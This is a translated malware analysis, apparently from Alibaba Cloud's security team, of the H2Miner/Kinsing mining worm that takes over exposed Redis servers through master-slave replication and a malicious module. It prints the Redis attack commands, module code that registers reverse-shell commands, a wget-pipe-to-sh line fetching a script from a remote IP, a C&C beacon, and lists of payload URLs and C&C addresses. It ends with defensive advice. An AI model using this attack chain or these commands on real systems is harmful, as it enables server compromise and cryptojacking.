Пре неки дан, један од сервера мог пројекта је напао сличан црв. У потрази за одговором на питање "шта је то било?" Нашао сам сјајан чланак Алибаба Цлоуд Сецурити тима. Пошто нисам нашао овај чланак на Хабре, одлучио сам да га преведем посебно за вас <3
Улазак
Недавно је безбедносни тим Алибаба Цлоуд-а открио изненадну појаву Х2Минер-а. Овај тип злонамерног црва користи недостатак ауторизације или слабе лозинке за Редис као капије ка вашим системима, након чега синхронизује сопствени злонамерни модул са подређеним путем мастер-славе синхронизације и на крају преузима овај злонамерни модул на нападнуту машину и извршава злонамерни упутства.
У прошлости, напади на ваше системе су првенствено вршени коришћењем методе која укључује заказане задатке или ССХ кључеве који су уписани на вашу машину након што се нападач пријавио на Редис. На срећу, овај метод се не може често користити због проблема са контролом дозвола или због различитих верзија система. Међутим, овај метод учитавања злонамерног модула може директно да изврши команде нападача или добије приступ љусци, што је опасно за ваш систем.
Због великог броја Редис сервера хостованих на интернету (скоро милион), тим за безбедност Алибаба Цлоуд-а, као пријатељски подсетник, препоручује корисницима да не деле Редис на мрежи и да редовно проверавају снагу својих лозинки и да ли су компромитоване. брз избор.
Х2Минер
Х2Минер је ботнет за рударење за системе засноване на Линук-у који могу да нападну ваш систем на различите начине, укључујући недостатак ауторизације у рањивости Хадооп иарн-а, Доцкер-а и Редис-овог даљинског извршавања команди (РЦЕ). Ботнет функционише тако што преузима злонамерне скрипте и злонамерни софтвер да би рударио ваше податке, проширио напад хоризонтално и одржао комуникацију команде и контроле (Ц&Ц).
Редис РЦЕ
Знање о овој теми поделио је Павел Топорков на ЗероНигхтс 2018. После верзије 4.0, Редис подржава функцију учитавања додатака која корисницима даје могућност да учитавају датотеке компајлиране са Ц у Редис да би извршиле одређене Редис команде. Ова функција, иако корисна, садржи рањивост у којој, у режиму мастер-славе, датотеке могу да се синхронизују са подређеним путем режима пуне ресинхронизације. Ово може да користи нападач за пренос злонамерних со датотека. Након што је пренос завршен, нападачи учитавају модул на нападнуту Редис инстанцу и извршавају било коју команду.
Анализа црва злонамерног софтвера
Недавно је безбедносни тим Алибаба Цлоуд открио да се величина групе злонамерних рудара Х2Минер изненада драматично повећала. Према анализи, општи процес настанка напада је следећи:
Х2Минер користи РЦЕ Редис за пуноправни напад. Нападачи прво нападају незаштићене Редис сервере или сервере са слабим лозинкама.
Затим користе команду config set dbfilename red2.so да промените име датотеке. Након тога, нападачи извршавају команду slaveof да бисте подесили адресу хоста мастер-славе репликације.
Када нападнута Редис инстанца успостави мастер-славе везу са злонамерним Редис-ом који је у власништву нападача, нападач шаље заражени модул користећи команду фуллресинц да синхронизује датотеке. Датотека ред2.со ће тада бити преузета на нападнуту машину. Нападачи затим користе модул за учитавање ./ред2.со да учитају ову со датотеку. Модул може да изврши команде од нападача или да покрене обрнуту везу (бацкдоор) да би добио приступ нападнутој машини.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Након извршења злонамерне команде као што је / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, нападач ће ресетовати име датотеке резервне копије и испразнити системски модул да би очистио трагове. Међутим, датотека ред2.со ће и даље остати на нападнутој машини. Корисницима се саветује да обрате пажњу на присуство такве сумњиве датотеке у фасцикли њихове Редис инстанце.
Осим што је убио неке злонамерне процесе да би украо ресурсе, нападач је пратио злонамерну скрипту преузимајући и извршавајући злонамерне бинарне датотеке на . То значи да име процеса или име директоријума који садржи кинсинг на хосту може указивати на то да је та машина заражена овим вирусом.
Према резултатима обрнутог инжењеринга, малвер углавном обавља следеће функције:
- Отпремање датотека и њихово извршавање
- Рударство
- Одржавање Ц&Ц комуникације и извршавање команди нападача
Користите массцан за спољно скенирање да бисте проширили свој утицај. Поред тога, ИП адреса Ц&Ц сервера је чврсто кодирана у програму, а нападнути домаћин ће комуницирати са Ц&Ц комуникационим сервером користећи ХТТП захтеве, где се информације о зомбију (компромитованом серверу) идентификују у ХТТП заглављу.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Друге методе напада
Адресе и везе које користи црв
/кинсинг
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
с&ц
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Савет
Прво, Редис не би требало да буде доступан са Интернета и требало би да буде заштићен јаком лозинком. Такође је важно да клијенти провере да не постоји ред2.со фајл у Редис директоријуму и да нема „кисинг“ у имену датотеке/процеса на хосту.
Извор: ввв.хабр.цом